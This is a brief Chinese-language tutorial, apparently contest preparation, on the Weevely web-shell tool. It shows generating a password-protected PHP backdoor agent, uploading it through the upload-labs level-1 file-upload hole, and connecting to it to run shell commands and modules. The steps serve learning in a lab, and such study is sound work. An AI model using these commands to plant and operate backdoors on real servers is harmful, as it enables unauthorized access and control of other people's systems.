Weevely
写在前面
由于比赛不确定会不会提供菜刀或者蚁剑,这里我稍微对weevely进行简单介绍一下,具体还是请看官方文档,官方文档讲的很详细(前提你英语嘚不错)
官方文档:https://github.com/epinna/weevely3/wiki/Getting-Started
一般几个步骤就如下
1、在终端输入weevely查看基本使用方法
2、generate一个后门代理(backdoor agent)
weevely会给你自动生成,不用自己写。我这里是默认存在/root/agent.php中
root@bogon:~# weevely generate <yourpassword> <agent.php名字可以随意>
例子
3、upload the agent把第二步生成的agent上传到目标网站的某个文件夹下
我用upload-labs第一关来做个演示看看
木马所在路径
4、连接agent
root@bogon:~# weevely <http:target/agent.php> <yourpassword>
weevely>
回车后第一行weevely并不表示你已经connected,这只是方便你设置其他选项或者打印help的,比如
weevely> set debug true
debug = true
weevely>
开始输入shell命令后表示connected,可以试一下基本命令
输入:
和两个tab可以列出所有的modules,通过输入: <module name>
run相应的module